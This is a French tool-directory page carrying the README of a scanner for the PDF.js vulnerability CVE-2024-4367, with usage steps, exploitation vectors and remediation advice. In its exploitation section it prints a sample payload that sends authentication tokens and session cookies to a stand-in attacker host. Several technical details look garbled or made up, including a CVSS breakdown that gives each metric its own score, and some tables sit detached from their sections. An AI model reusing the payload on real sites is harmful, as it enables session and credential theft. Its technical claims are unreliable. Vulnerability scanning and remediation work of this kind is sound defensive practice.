Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pdf.js-CVE-2024-4367 — SCAN END POC LE CVE-2024-4367 | Kitploit
Outils/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

SCAN END POC LE CVE-2024-4367

Voir le dépôt
112il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2024-4367 - Scanner universel de vulnérabilité PDF.js

⚠️ OUTIL DE SÉCURITÉ CRITIQUE | Détecte CVE-2024-4367 (CVSS 9.8) - Vulnérabilité d'exécution de code à distance PDF.js

Version CVSS CVE License

Fonctionne sur TOUT site web - Aucune configuration requise


📋 Table des matières

  • 📖 Aperçu
  • ⚡ Démarrage rapide
  • 🔍 Ce qu'il détecte
  • 🛠️ Comment ça marche
  • 📊 Exemples de sortie
  • 🔒 Guide de correction
  • 🎯 Vecteurs d'exploitation
  • 🧪 Instructions de test
  • 📝 Détails techniques
  • ⚠️ Avertissement légal
  • 📚 Références

📖 Aperçu

CVE-2024-4367 est une vulnérabilité critique dans PDF.js (versions < 4.2.67) qui permet l'exécution arbitraire de JavaScript via des fichiers PDF malveillants. Ce scanner détecte automatiquement les instances PDF.js vulnérables sur TOUT site web.

Pourquoi ce scanner est différent

  • ✅ Aucune configuration - Fonctionne instantanément sur tout site web
  • ✅ Détection universelle - Analyse tous les bundles JavaScript
  • ✅ Aucune dépendance - JavaScript pur
  • ✅ Preuve de concept - Génère un PDF de test
  • ✅ Résultats exploitables - Étapes de correction claires

La vulnérabilité

PDF.js contient une faille où le JavaScript intégré dans les fichiers PDF est exécuté sans sandboxing adéquat, permettant aux attaquants de :

  • 🏴‍☠️ Voler des jetons d'authentification depuis localStorage/sessionStorage
  • 🍪 Exfiltrer les cookies de session
  • 📁 Accéder aux fichiers locaux (si Electron/application de bureau)
  • 🔐 Effectuer des actions en tant que victime à l'aide des identifiants volés
  • 🌐 Pivoter vers des réseaux internes via XSS

⚡ Démarrage rapide

Méthode 1 : Console du navigateur (la plus simple)

  1. Ouvrez le site web cible
  2. Appuyez sur F12 pour ouvrir les outils de développement
  3. Allez dans l'onglet Console
  4. Collez l'intégralité du script du scanner
  5. Appuyez sur Entrée
  6. Visualisez les résultats visuels à l'écran !

Méthode 2 : Marque-page

Créez un marque-page avec cette URL :

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

Méthode 3 : Téléchargement direct

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Ouvrez n'importe quel site web et exécutez le script

🔍 Ce qu'il détecte

Phase 1 : Analyse des bundles JavaScript

  • ✅ Détection de version PDF.js
  • ✅ Identification de versions vulnérables (< 4.2.67)
  • ✅ Références dans package.json
  • ✅ Chemins node_modules

Phase 2 : Identification des visionneuses PDF

  • ✅ Visionneuses PDF dans ``
  • ✅ Éléments <embed>
  • ✅ Balises de données <object>
  • ✅ Conteneurs personnalisés de visionneuses PDF
  • ✅ Rendu basé sur canvas

Phase 3 : Vecteurs d'exploitation

  • ✅ Paramètres d'URL (?pdf=, ?file=, ?src=)
  • ✅ Formulaires de téléchargement PDF
  • ✅ Champs de fichier acceptant .pdf
  • ✅ Points d'API avec chemins PDF

Phase 4 : Indicateurs visuels

  • ✅ Statut de vulnérabilité en direct
  • ✅ PDF de preuve de concept téléchargeable
  • ✅ Superposition DOM en temps réel

🛠️ Comment ça marche

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    FLUX DU PROCESSUS D'ANALYSE              │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 CHARGER LES SCRIPTS                                  │
│     ├─ Scripts externes (tous les <script src="">)        │
│     └─ Scripts en ligne (toutes les balises <script>)      │
│                                                             │
│  2. 🔍 EXTRAIRE LA VERSION DE PDF.JS                       │
│     ├─ Correspondance de motifs dans le code               │
│     ├─ Détection de package.json                            │
│     └─ Analyse des chemins node_modules                     │
│                                                             │
│  3. 🎯 IDENTIFIER LA VULNÉRABILITÉ                         │
│     ├─ version < 4.2.67 ? → VULNÉRABLE                    │
│     └─ version = 2.16.105 ? → VULNÉRABLE                  │
│                                                             │
│  4. 🖼️ LOCALISER LES VISIONNEUSES                          │
│     ├─ Analyse des éléments DOM                             │
│     └─ Détection d'attributs                                │
│                                                             │
│  5. ⚡ GÉNÉRER UNE POC                                     │
│     ├─ Créer un PDF de test                                 │
│     └─ Fournir un lien de téléchargement                    │
│                                                             │
│  6. 📊 AFFICHER LES RÉSULTATS                               │
│     ├─ Superposition visuelle                               │
│     ├─ Rapport dans la console                              │
│     └─ Stockage en variable globale                         │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 Exemples de sortie

Sortie dans la console

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - SCANNER UNIVERSEL PDF.js                        ║
║              Détecte les versions vulnérables de PDF.js et l'exploitation          ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 PHASE 1 : Analyse des bundles JavaScript pour PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 42 scripts externes trouvés
[+] 12 scripts en ligne trouvés
   [1/42] Analyse : vendor.bundle.js
      → Indicateur PDF.js trouvé : pdfjs-dist
      ✅ Version PDF.js trouvée : 2.16.105
      🚨 VULNÉRABLE à CVE-2024-4367 !

🎯 PHASE 4 : Identification des vecteurs d'exploitation
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ Le paramètre d'URL accepte le PDF : file=/documents/report.pdf
   ⚠️ Formulaire de téléchargement PDF trouvé

█████████████████████████████████████████████████████████████████████████████████
                          RAPPORT D'ANALYSE FINAL
█████████████████████████████████████████████████████████████████████████████████

🚨 VULNÉRABILITÉ CRITIQUE CONFIRMÉE !
   CVE : CVE-2024-4367
   CVSS : 9.8 (CRITIQUE)
   Impact : Exécution arbitraire de JavaScript

Superposition visuelle

Scanner Overlay

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  RÉSULTATS DE L'ANALYSE CVE-2024-4367                     │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Cible : example.com                                    │
│  📦 PDF.js : 2.16.105                                       │
│  🎯 Vulnérable : OUI                                        │
│  📄 Visionneuses : 3                                        │
│  ⚡ Vecteurs : 2                                            │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRITIQUE - Mise à niveau requise                        │
└─────────────────────────────────────────────────────────────┘

🔒 Guide de correction

Actions immédiates

1. Mise à niveau de PDF.js (recommandée)

root@kitploit:~
# Pour les projets Node.js
npm install pdfjs-dist@latest

# Pour une utilisation CDN
# Mettre à jour vers la version 4.2.67 ou supérieure

2. Désactiver l'exécution JavaScript

root@kitploit:~
// Définir ceci avant de charger PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. Politique de sécurité du contenu (CSP)

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. Validation des entrées

root@kitploit:~
// Valider les fichiers PDF avant le rendu
function validatePDF(file) {
    // Vérifier les octets magiques
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Fichier PDF invalide');
    }
    
    // Rechercher du JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('Le PDF contient du JavaScript');
    }
}

Solutions à long terme


🎯 Vecteurs d'exploitation

Vecteurs courants détectés

  1. Paramètres d'URL

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. Téléchargements de fichiers

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. Visionneuses intégrées

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. Points d'API

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

Exemple de charge utile malveillante

root@kitploit:~
// PDF JavaScript intégré
this.alert('CVE-2024-4367 Exploité !');
fetch('https://attaquant.com/vol', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 Instructions de test

Test pas à pas

  1. Installer le scanner

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. Exécuter le scanner

    root@kitploit:~
    # Ouvrir le site web cible
    # Coller le scanner dans la console
    # Ou utiliser le marque-page
    
  3. Analyser les résultats

    • Recherchez le statut "VULNÉRABLE"
    • Notez la version de PDF.js
    • Vérifiez les vecteurs d'exploitation
  4. Télécharger le PDF POC (si vulnérable)

    • Cliquez sur le bouton de téléchargement
    • Téléchargez/ouvrez le PDF
    • Observez l'exécution JavaScript
  5. Appliquer les correctifs

    • Mettez à niveau PDF.js
    • Implémentez CSP
    • Validez les entrées

Résultats attendus

ScénarioRésultat
PDF.js 2.16.105🔴 CRITIQUE
PDF.js 3.x🔴 VULNÉRABLE
PDF.js 4.0.x🔴 VULNÉRABLE
PDF.js 4.2.67+

📝 Détails techniques

Vérification de version

root@kitploit:~
// Versions vulnérables
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITIQUE' },
    { version: '3.x.x', status: 'CRITIQUE' },
    { version: '4.0.x - 4.2.66', status: 'CRITIQUE' }
];

// Version sûre
const SAFE_VERSION = '4.2.67';

Chronologie de la vulnérabilité

DateÉvénement
2024-04-23Vulnérabilité découverte
2024-04-24CVE-2024-4367 attribuée
2024-04-25

Répartition du score CVSS


⚠️ Avertissement légal

IMPORTANT : Cet outil est destiné à des tests de sécurité autorisés et à des fins éducatives uniquement.

  • ✅ FAITES-LE sur vos propres sites web
  • ✅ FAITES-LE avec une autorisation explicite
  • ✅ FAITES-LE pour la recherche en sécurité
  • ❌ NE FAITES PAS cela sur des systèmes non autorisés
  • ❌ NE FAITES PAS cela à des fins malveillantes

Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.


📚 Références

Ressources officielles

  • CVE-2024-4367 - NIST NVD
  • Avis de sécurité PDF.js
  • Blog sécurité de Mozilla

Vulnérabilités connexes

  • CVE-2024-4367 - RCE PDF.js
  • CVE-2023-xxxx - Problèmes antérieurs de PDF.js
  • XSS via PDF.js dans les applications web

Outils et ressources

  • Dépôt officiel PDF.js
  • Prévention XSS OWASP
  • Référence CSP

Articles de recherche

  • Analyse de sécurité PDF.js
  • Risques de rendu PDF côté client

🤝 Contribution

Les contributions sont les bienvenues ! Veuillez :

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Soumettre une pull request
  4. Suivre le style de code

Configuration de développement

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Faites vos modifications
# Testez sur plusieurs sites web
# Soumettez la PR

📄 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.


🌟 Soutien

Si vous trouvez cet outil utile :

  • ⭐ Star le dépôt
  • 🐛 Signaler des problèmes
  • 📝 Rédiger de la documentation
  • 🔧 Soumettre des correctifs

🛡️ Restez sécurisé. Testez tôt. Testez souvent.

Fait avec ❤️ par la communauté de la sécurité

Signaler un problème • Star sur GitHub • Lire la documentation

Télécharger l’outil
SolutionDifficultéEfficacité
Mise à niveau de PDF.jsFacile✅ Correction complète
Désactiver JS dans PDF.jsFacile✅ Correction complète
Mise en œuvre de CSPMoyenne✅ Bonne
Validation côté serveurMoyenne✅ Bonne
Rendu dans un bac à sableDifficile✅ Excellente
✅ SÛR
Pas de PDF.jsℹ️ SÛR
Correctif publié (4.2.67)
2024-04-26Divulgation publique
2024-05-01Tentatives d'exploitation observées
ComposantScore
Vecteur d'attaqueRéseau (9.8)
Complexité d'attaqueFaible (9.8)
Privilèges requisAucun (9.8)
Interaction utilisateurRequise (8.8)
PérimètreModifié (9.1)
ConfidentialitéÉlevée (9.8)
IntégritéÉlevée (9.8)
DisponibilitéÉlevée (9.8)
Global9.8 (CRITIQUE)